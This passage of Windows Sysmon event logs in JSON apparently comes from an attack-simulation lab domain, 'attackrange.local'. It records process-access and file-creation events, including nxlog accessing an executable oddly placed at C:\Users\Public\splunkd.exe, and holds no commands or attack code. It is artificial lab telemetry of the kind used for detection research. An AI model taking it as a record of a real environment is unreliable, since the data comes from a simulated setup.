(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:44.904\r\nProcessGuid: {E2A3D6B1-1394-5F25-0000-001098401000}\r\nProcessId: 4616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1208-0\\System.Web.Extensions.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:44.904","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:44.904","ProcessGuid":"{E2A3D6B1-1394-5F25-0000-001098401000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1208-0\\System.Web.Extensions.Design.dll","CreationUtcTime":"2020-08-01 07:02:44.904","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-0010CD451000}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-0010CD451000}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-0010CD451000}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-0010CD451000}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-0010CD451000}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-0010CD451000}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:45.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1395-5F25-0000-00109C491000}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:45.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1395-5F25-0000-00109C491000}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:45.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1395-5F25-0000-00109C491000}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:45.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1395-5F25-0000-00109C491000}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:45.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1395-5F25-0000-00109C491000}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:45.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1395-5F25-0000-00109C491000}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:45.435\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:45.435","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
